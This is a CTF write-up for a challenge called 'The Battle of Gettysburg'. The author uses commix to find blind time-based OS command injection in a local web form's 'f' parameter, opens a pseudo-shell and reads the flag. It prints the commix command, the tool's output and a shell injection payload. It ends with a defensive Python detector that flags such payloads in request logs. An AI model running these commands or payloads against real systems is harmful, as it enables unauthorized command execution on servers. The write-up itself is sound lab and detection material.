2019 Stonecutters - The Battle of Gettysburg

Here's our latest write-up for the secret Stonecutters challenge that we've code named "The Battle of Gettysburg."

Somebody is Going to Get Parasites

For this challenge we made use of a tool that automates OS command injection.

Okay, let's get into it.

As with all of the other "Any Key" challenges, I registered my SSH key with the scoring server and was then able to connect to a web server on 127.0.0.1:8080. For more information about this CTF, feel free to check out this post.

The page that loaded had a simple input field, prompting me to check whether a file existed, and a submit button labeled "fire".

Naturally, I tried /etc/passwd and here's what I saw:

Hit!

When I checked for "foo", I saw a message that said "missed."
I then entered /flag.txt and got another hit.

I tried really hard to find an LFI, and I also spent some time attempting to eke out a SQL error. However, commix was the tool that won the Battle of Gettysburg.

Here's what I did.

First, I installed commix:
# git clone https://github.com/commixproject/commix.git

Next, I targeted the "f" parameter in the POST request I had seen while trying to find an LFI vuln.
As this was a POST request, I used the -d option. Note that this option supplies the data string to be sent in the POST body.

So, my command looked like this:
# python commix.py -u http://127.0.0.1:8080/index.php -d f=*
                                      __           
   ___   ___     ___ ___     ___ ___ /\_\   __  _   
 /`___\ / __`\ /' __` __`\ /' __` __`\/\ \ /\ \/'\  v2.8-dev#1
/\ \__//\ \L\ \/\ \/\ \/\ \/\ \/\ \/\ \ \ \\/>  </  
\ \____\ \____/\ \_\ \_\ \_\ \_\ \_\ \_\ \_\/\_/\_\ https://commixproject.com
 \/____/\/___/  \/_/\/_/\/_/\/_/\/_/\/_/\/_/\//\/_/ (@commixproject)

+--

Automated All-in-One OS Command Injection and Exploitation Tool
Copyright (c) 2014-2019 Anastasios Stasinopoulos (@ancst)
+--

(!) Legal disclaimer: Usage of commix for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program.


[*] Checking connection to the target URL... [ SUCCEED ]

[*] Setting the POST parameter 'f' for tests.
[*] Testing the (results-based) classic command injection technique... [ FAILED ]
[*] Testing the (results-based) dynamic code evaluation technique... [ FAILED ]
[*] Testing the (blind) time-based command injection technique... [ SUCCEED ]
[+] The POST parameter 'f' seems injectable via (blind) time-based command injection technique.
    [~] Payload: ;str=$(echo AVMINX);str1=$(expr length "$str");if [ 6 != $str1 ];then sleep 0;else sleep 1;fi 

[?] Do you want a Pseudo-Terminal shell? [Y/n] > Y


Pseudo-Terminal (type '?' for available options)

commix(os_shell) > ls
[*] Retrieving the length of execution output... [ SUCCEED ]
[*] Retrieved: 9
[*] Presuming the execution output, please wait... [ SUCCEED ]

indes.php


[*] Finished in 00:01:42.

commix(os_shell) > cat /flag.txt
[*] Retrieving the length of execution output... [ SUCCEED ]
[*] Retrieved: 86
[*] Presuming the execution output, please wait... [ 64.0% ]
[*] Presuming the execution output, please wait... [ SUCCEED ]

flag:{HomerSimpsonSinksHisBrothersCarDealership} https:K/wwwr`outube.com/watch?v)g65cuaqoeT0


[*] Finished in 00:36:17.


Note that the elapsed times are shown as hours:minutes:seconds. It took 36 minutes for that flag to return, and I was really lucky that the flag's characters didn't get all messed up like they did in the YouTube URL and in the output of the 'ls' command. Time-based command injection attacks can be a harsh mistress.
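Every one of those 36 minutes' worth of requests carried a payload shaped like the one commix reported above, which is exactly what a defender can key on. As an added example that is not part of the original post or of commix, here is a small Python detector that URL-decodes the `f` parameter from constructed application-log lines (the `METHOD PATH body="..."` log format is an assumption) and flags the shell separators, command substitution, conditional and `sleep` delay that a time-based probe needs.

```python
import re
from urllib.parse import parse_qs

# Indicators of OS command injection in a decoded parameter value. The
# sleep/if pair mirrors the time-based payload commix reported above.
INDICATORS = {
    "shell_separator": re.compile(r"[;&|]"),
    "command_substitution": re.compile(r"\$\(|`"),
    "time_delay": re.compile(r"\bsleep\s+\d+"),
    "shell_conditional": re.compile(r"\bif\s*\[.*\]\s*;\s*then\b"),
}

# Assumed log format: one request per line with the raw POST body quoted.
LOG_RX = re.compile(r'^(?P<method>\S+) (?P<path>\S+) body="(?P<body>[^"]*)"$')

def inspect_value(value):
    """Return the names of the indicators that match one parameter value."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(value))

def inspect_body(body):
    """URL-decode a POST body; return {param: [indicators]} for suspicious params."""
    findings = {}
    for param, values in parse_qs(body, keep_blank_values=True).items():
        hits = sorted({h for v in values for h in inspect_value(v)})
        if hits:
            findings[param] = hits
    return findings

def scan_log(lines):
    """Return (path, findings) for every POST whose body looks injected."""
    alerts = []
    for line in lines:
        m = LOG_RX.match(line)
        if m and m.group("method") == "POST":
            findings = inspect_body(m.group("body"))
            if findings:
                alerts.append((m.group("path"), findings))
    return alerts

# Constructed sample log lines (not taken from the original post): the two
# legitimate probes from the write-up and one commix-style timing payload.
SAMPLE_LOG = [
    'POST /index.php body="f=%2Fetc%2Fpasswd"',
    'POST /index.php body="f=foo"',
    'POST /index.php body="f=%3Bstr%3D%24%28echo+AVMINX%29%3Bstr1%3D%24%28expr'
    '+length+%22%24str%22%29%3Bif+%5B+6+%21%3D+%24str1+%5D%3Bthen+sleep+0'
    '%3Belse+sleep+1%3Bfi"',
]

if __name__ == "__main__":
    for path, findings in scan_log(SAMPLE_LOG):
        print(path, findings)
```

A single hit like this is only a probe; the commix run above generated one such request per candidate character, so pairing this check with a per-client request-rate or response-time alert catches the extraction itself.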

Awesome tool though; Commix is no joke.

Thanks for reading!
@strupo_

Find us on Twitter: @teamWTG
